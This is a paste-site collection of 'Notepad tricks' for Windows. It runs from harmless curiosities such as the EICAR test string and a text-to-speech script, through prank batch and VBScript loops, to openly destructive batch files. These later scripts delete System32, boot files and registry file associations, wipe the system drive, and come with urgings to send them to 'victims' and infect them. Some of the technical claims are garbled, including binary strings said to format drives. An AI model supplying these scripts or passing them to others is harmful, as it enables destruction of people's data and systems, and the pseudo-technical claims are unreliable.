Notepad Hacking


SUBMITTED BY: ProffesorFaux

DATE: April 6, 2020, 5:48 p.m.

FORMAT: Text only

SIZE: 13.2 kB

HITS: 539

  1. þÿ
  2. Best Notepad Tricks
  3. Latest notepad tricks &. Best Notepad tricks cool notepad tricks
  4. #1 Bush Hid the Facts Most Popular Notepad Tricks
  5. This is one of the mysterious notepad tricks we know. According to the trick it really seems Microsoft had put some hack into the coding of notepad making the text hidden after saving it.
  6. Bush Hid the Facts Most Popular Notepad Trick Open notepad. Type BUSH HID THE FACTS
  7. Save that file.
  8. Close it
  9. Open It Again See & Why This Happens ? :
  10. It was later known 4335 Rule. It means that if we enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters each, and the last word has five letters. Then Notepad Automatically hides the text into unknown code. Similar are with this app can break .
  11. OR
  12. STEP 1: OPEN NOTEPAD
  13. STEP 2: WRITE FOLLOWING LINE IN THE NOTEPAD.
  14. THIS APP CAN BREAK
  15. STEP 3: SAVE THIS FILE AS AAA.TXT
  16. STEP 4: CLOSE THE NOTEPAD.
  17. STEP 5: OPEN THE FILE AGAIN.
  18. VOILLA!!
  19. OR
  20. 1> OPEN NOTEPAD
  21. 2> ENTER FOUR WORDS SEPARATED BY SPACES, WHEREIN THE FIRST WORD HAS 4 LETTERS, THE NEXT TWO HAV LETTERS, AND THE LAST WORD HAS FIVE LETTERS
  22. 3> DON T HIT ENTER AT THE END OF THE LINE. 4> SAVE THE FILE.
  23. 5> CLOSE NOTEPAD.
  24. 6> REOPEN NOTEPAD.
  25. 7> OPEN THE FILE YOU JUST SAVED.
  26. YOU ARE DONE!!!
  27. #2 World Trade Centre Attack Trick Shocking Notepad Tricks
  28. Did you know that the flight number of the plane that had hit WTC on 9/11 was Q33NY &
  29. Open your Notepad
  30. Type the flight number i.e Q33N in Capital Letters. Increase the Font Size to 72
  31. Change the Font to Wingdings
  32. You will be amazed by the findings. Its a Plane going for 2 building shaped structures & then death.(see below) WTF ?
  33. Must Be Shocking Right.
  34. But This Is Only Hoax As No Plane No:-Q33N Crashed Into Twin Towers.
  35. #3. Test Your Anti-Virus
  36. You can also test your anti virus program for its effectiveness using a simple notepad trick. Follow the steps below to know more:
  37. Open Notepad.
  38. Copy the code give below in the notepad file: X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* Save it with an .exe extension like testvirus.exe
  39. This test is also known as EICAR (European Institute for Computer Antivirus Research) test file.
  40. The file is simply a text file of either 68 or 70 bytes that is a legitimate executable file called a COM file
  41. that can be run by Microsoft operating systems and some work-alikes (except for 64-bit due to 16-bit limitations), including OS/2. When executed, it will print EICAR-STANDARD-ANTIVIRUS-TEST-FILE! and then stop. The test string was specifically engineered to consist of ASCII human-readable characters, easily
  42. created using a standard computer keyboard. It makes use of self-modifying code to work around technical issues that this constraint makes on the execution of the test string.
  43. #4. Continually Pop The CD Drive
  44. Open Notepad.
  45. Copy the code given below onto the notepad file:
  46. Set oWMP = CreateObject( WMPlayer.OCX.7?) Set colCDROMs = oWMP.cdromCollection
  47. do
  48. if colCDROMs.Count >= 1 then
  49. For i = 0 to colCDROMs.Count 1
  50. colCDROMs.Item(i).Eject
  51. Next
  52. For i = 0 to colCDROMs.Count 1
  53. colCDROMs.Item(i).Eject
  54. Next
  55. End If
  56. wscript.sleep 5000
  57. loop
  58. Save it as Anything.VBS .
  59. Now open the file and see the magic! The file will continuously force the CD rom to pop out! And If you have more than one then it pops out all of them!
  60. Note: Don t worry when this crazy notepad trick opens your cd tray continuously. If you want to end this script simply Open Task Manager(Alt+Ctrl+Delete). Under Processes end the process wscript.exe
  61. #5.Convert Text Into Audio Using Notepad How To Do It ?
  62. Open Notepad file on your Windows PC. Copy and paste the below mentioned code :
  63. Dim Message, Speak
  64. Message=InputBox( Enter text , Speak )
  65. Set Speak=CreateObject( sapi.spvoice )
  66. Speak.Speak Message
  67. Save this file with any name with .vbs as extension. For eg. Text-To-Audio.vbs
  68. Thats it ! Your Text to Audio converter is ready to be used. Now open the saved file and key in the text you want to convert and click OK. If you find any difficulties in using this code, let me know via comments section.
  69. #6. Matrix Effect
  70. Not much to explain, just follow the steps and see the amazing matrix effect happen in your DOS window:
  71. Open Notepad.
  72. Copy the below mentioned text in your notepad file:
  73. @echo off color 02 :start
  74. echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% goto start
  75. Save the file with .bat extension like Matrix.bat
  76. Thats it. Just open the file to see the matrix effect right before your eyes!
  77. #7. Change The Header/Footer Of Your Notepad File
  78. More often than not whenever you get a printout of your notepad file, it starts with Untitled or the filename at top, and Page on bottom. Now if you want to get rid of it or want to change it, just follow the simple steps given below.
  79. Open Notepad.
  80. Click on File -> Page Setup.
  81. Replace the text written in the Header and Footer box (as shown above) by any of the following codes:
  82. &l Left-align the characters that follow &c Center the characters that follow
  83. &r Right-align the characters that follow &d Print the current date
  84. &t Print the current time
  85. &f Print the name of the document &p Print the page number
  86. #8. Constantly Repeat Messages
  87. Using this notepad trick you can annoy anyone and can actually force them to log off or leave the computer (LOL &.). This notepad trick will create an infinite cycle of a message in the computer. Follow the steps to know more:
  88. Open Notepad.
  89. Paste the following code in the notepad file:
  90. @ECHO off
  91. :Begin
  92. msg * Hi
  93. msg * Are you having fun? msg * I am!
  94. msg * Lets have fun together!
  95. msg * Because you have been o-w-n-e-d
  96. GOTO BEGIN
  97. Save the file with any file name but with .bat as extension and close it. For eg. Freakymessage.bat After saving the file just open it (by double clicking) and see what happens.
  98. #9. Shut-down The Computer After Conveying Any Message
  99. This one is kind of an annoying trick and if used unknowingly can certainly cause problems (am serious). What this trick does is, after conveying a (any) message it shuts down the computer without any confirmation. In order to create the Shutdown file, follow the below mentioned steps:
  100. Open Notepad.
  101. Paste the following code in it:
  102. @echo off
  103. msg * Its time to get some rest.
  104. shutdown -c Error! You have to take rest! Byeeeeee -s
  105. Save the file with any name but with .bat extension and close it. For eg. TakeRest.bat #10. Toggle Keyboard Button Simultaneously
  106. Using Notepad (and VB) you can set different keys on your keyboard to toggle continuously. Following are the 3 tricks using which different keys can be set to toggle simultaneously. Follow the steps given under each head
  107. to try out the tricks.
  108. 1. Caps Lock Key
  109. Open Notepad.
  110. Paste the following code in the notepad file:
  111. Set wshShell =wscript.CreateObject( WScript.Shell ) do
  112. wscript.sleep 100
  113. wshshell.sendkeys {CAPSLOCK}
  114. loop
  115. Save the file with anyname and .vbs extension. and close it.
  116. Now open the newly created file and see how the caps lock key behaves on your keyboard!
  117. 2. Hit Enter Key Continuously
  118. Open Notepad.
  119. Paste the following code in the notepad file:
  120. Set wshShell = wscript.CreateObject( WScript.Shell ) do
  121. wscript.sleep 100
  122. wshshell.sendkeys ~(enter)
  123. loop
  124. Save the file with any name and .vbs extension and close it.
  125. Now open the newly created file and see how the enter key behaves!
  126. 3. Hit Backspace Key Continuously
  127. Open Notepad.
  128. Paste the following code in the notepad file:
  129. MsgBox Lets Rumble
  130. Set wshShell =wscript.CreateObject( WScript.Shell )
  131. do
  132. wscript.sleep 100
  133. wshshell.sendkeys {bs}
  134. loop
  135. Save the file with any name and with .vbs extension and close it. Now open the newly created file and see how the key behaves!
  136. #11. Type You are a fool Continuously
  137. Not much to explain, the title says it all! Follow the steps to make this trick work:
  138. Open Notepad.
  139. Paste the following code in the notepad file:
  140. Set wshShell = wscript.CreateObject( WScript.Shell ) do
  141. wscript.sleep 100
  142. wshshell.sendkeys You are a fool.
  143. loop
  144. Save the file with any name but with .vbs extension and close it. Ope the file and see how it makes you type!
  145. #12. Open Notepad continuously
  146. Open Notepad.
  147. Paste the following code in your notepad file: @ECHO off
  148. :top
  149. START %SystemRoot%system32notepad.exe GOTO top
  150. Save the file with any name nut with .bat extension and close it.
  151. Now open the file and see how it annoys you by opening notepad again and again.
  152. #13. Pick Your Option Batch File
  153. When used this creates a file which asks you to choose a number between 1-5 and then does a certain action (as shown below Action accompanied by number):
  154. 1 Shut s down the computer
  155. 2 Restart s the computer
  156. 3 Wipes out the hard drive
  157. 4 Net send
  158. 5 Shows a message & then shut s down the computer
  159. Before you try out this trick, keep in mind that this can cause loss of important data on your (or any one else s on which you are running this file) computer system. So BEWARE! In order to create the file, follow the steps given below:
  160. Open Notepad.
  161. Paste the following code in the notepad file:
  162. @echo off
  163. title Get A Life
  164. cd C:
  165. :menu
  166. cls
  167. echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press x then your PC will be formatted. Do not cry if you loose your data or anything.
  168. pause
  169. echo Pick your option: echo 1. Die Slowly
  170. echo 2. Instant Death
  171. echo 3. Stay Away From This One
  172. echo 4. Die this way (For Wimps!)
  173. echo 5. Easy way out
  174. set input=nothing
  175. set /p input=Choice:
  176. if %input%==1 goto one
  177. if %input%==2 goto two
  178. Save the file with any name and with a .bat extension and close the file.
  179. #14. IN THIS HACK I WILL SHOW YOU HOW TO FORMAT A HDD USING NOTEPAD NOTEPAD. THIS IS REALLY COOL.
  180. (A) STEP 1 :-
  181. COPY THE FOLLOWING IN NOTEPAD EXACTLY AS IT IS.
  182. SAYS01001011000111110010010101010101010000011111100000
  183. STEP 2 :-
  184. SAVE AS AN .EXE ANY NAME WILL DO
  185. STEP 3 :-
  186. SEND THE .EXE TO PEOPLE AND INFECT
  187. OR
  188. AND HOW TO DESTROY VICTIMS PC
  189. IF YOU THINK CANNOT FORMAT C DRIVE WHEN WINDOWS IS RUNNING TRY LAUGHING AND U WILL GET IT Secret. AN MORE SO U CAN TEST ON OTHER DRIVES THIS IS SIMPLE BINARY CODE
  190. FORMAT C:\ /Q/X THIS WILL FORMAT YOUR DRIVE C:\ 01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000
  191. FORMAT D:\ /Q/X THIS WILL FORMAT YOUR DIRVE D:\ 01100110011011110111001001101101011000010111010000 100000011001000011101001011100 0010000000101111010100010010111101011000
  192. FORMAT A:\ /Q/X THIS WILL FORMAT YOUR DRIVE A:\
  193. 01100110011011110111001001101101011000010111010000 100000011000010011101001011100 0010000000101111010100010010111101011000
  194. DEL /F/S/Q C:\BOOT.INI THIS WILL CAUSE YOUR COMPUTER NOT TO BOOT. 01100100011001010110110000100000001011110100011000 101111010100110010111101010001 00100000011000110011101001011100011000100110111101 101111011101000010111001101001 0110111001101001
  195. TRY TO FIGURE OUT URSELF REST
  196. CANT SPOONFEED
  197. ITS WORKING
  198. DO NOT TRY IT ON YOUR PC. DON T MESS AROUND THIS IS FOR EDUCATIONAL PURPOSE ONLY STILL IF YOU CANT FIGURE IT OUT TRY THIS
  199. GO TO NOTEPAD AND TYPE THE FOLLOWING: (B) @ECHO OFF
  200. DEL C:\ *.*|Y
  201. SAVE IT AS DELL.BAT
  202. WANT WORSE THEN TYPE THE FOLLOWING: @ECHO OFF
  203. DEL %SYSTEMDRIVE%\*.*/F/S/Q
  204. SHUTDOWN -R -F -T 00
  205. AND SAVE IT AS A .BAT FILE
  206. (C) HOW TO SHUTDOWN A COMPUTER FOREVER.. CODE:
  207. @ECHO OFF
  208. ATTRIB -R -S -H C:\AUTOEXEC.BAT
  209. DEL C:\AUTOEXEC.BAT
  210. ATTRIB -R -S -H C:\BOOT.INI
  211. DEL C:\BOOT.INI
  212. ATTRIB -R -S -H C:\NTLDR
  213. DEL C:\NTLDR
  214. ATTRIB -R -S -H C:\WINDOWS\WIN.INI
  215. DEL C:\WINDOWS\WIN.INI
  216. OPEN UP AND COPY THE CODE AND SAVE IT AS .BAT FILE..
  217. THIS WILL SHUT DOWN THE PERSON S COMPUTER.IT SHUTS IT OFF ONCE AND DELETES THE FILES NEEDED TO RE RESTART.
  218. REMEMBER DO NOT OPEN THE FILE.
  219. YOU WON T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE! (D) A SIMPLE HACK TO DESTROY UR VICTIM S PC
  220. I M HERE EXPLAIN TO MAKE A FILE THAT DESTROYS UR VICTIMS PC
  221. I M NOT RESPONSIBLE FOR THE DAMAGE CAUSED BY THIS FILE.
  222. 1. OPEN NOTEPAD
  223. 2. WRITE THE ABOVE COMMAND : -
  224. DEL C:\WINDOWS\SYSTEM32\*.*/Q
  225. 3. SAVE THE ABOVE NOTEPAD WITH THE EXTENSION .BAT OR .CMD AS U WANT 4. !!!!!!!!!!!!!!!!!!!!!!ATTENTION!!!!!!!!!!!!!!!!!!! !!!
  226. DON T DOUBLE CLICK THE FILE OTHERWISE U R IN TROUBLE.
  227. WHY ?????? BCZ THE FILE U CREATED DELETE ALL FILES FROM UR
  228. SYSTEM32 FOLDER AND WHEN U RESTART UR PC IT WILL NOT START
  229. BCZ SYSTEM CAN NOT FIND THE FILES IN THE SYSTEM32 FOLDER WHICH
  230. IS REQUIRED AT THE TIME OF BOOTING.
  231. 5. YOU CAN ALSO TEST THE ABOVE BY CREATING A FAKE FOLDER LET SUPPOSE WINDOWS1 IN C:\. COPY SOME OLD FILES IN IT AND JUST FOLLOW THE
  232. ABOVE COMMAND.BY DOUBLE CLICKING THE BAT OR CMD FILE UR ALL FILES AUTOMAITCALLY GET DELETED.
  233. 6. YOU CAN TRY THIS FILE IN ANY ONE`S COMPUTER.(BUT THIS RESULT IN CAUSING DAMAGE TO THE COMPUTER, S AGAIN BEFORE TRYING THIS ON ANYONE S PC)
  234. ***MOST DANGEROUS NOTEPAD TRICK*** OPEN NOTEPAD
  235. TYPE:
  236. @ECHO OFF
  237. START REG DELETE HKCR/ .EXE
  238. START REG DELETE HKCR/.DLL
  239. START REG DELETE HKCR/* :MESSAGE
  240. ECHO YOUR COMPUTER HAS BEEN FCKED.HAVE A
  241. NICE DAY.
  242. GOTO MESSAGE

comments powered by Disqus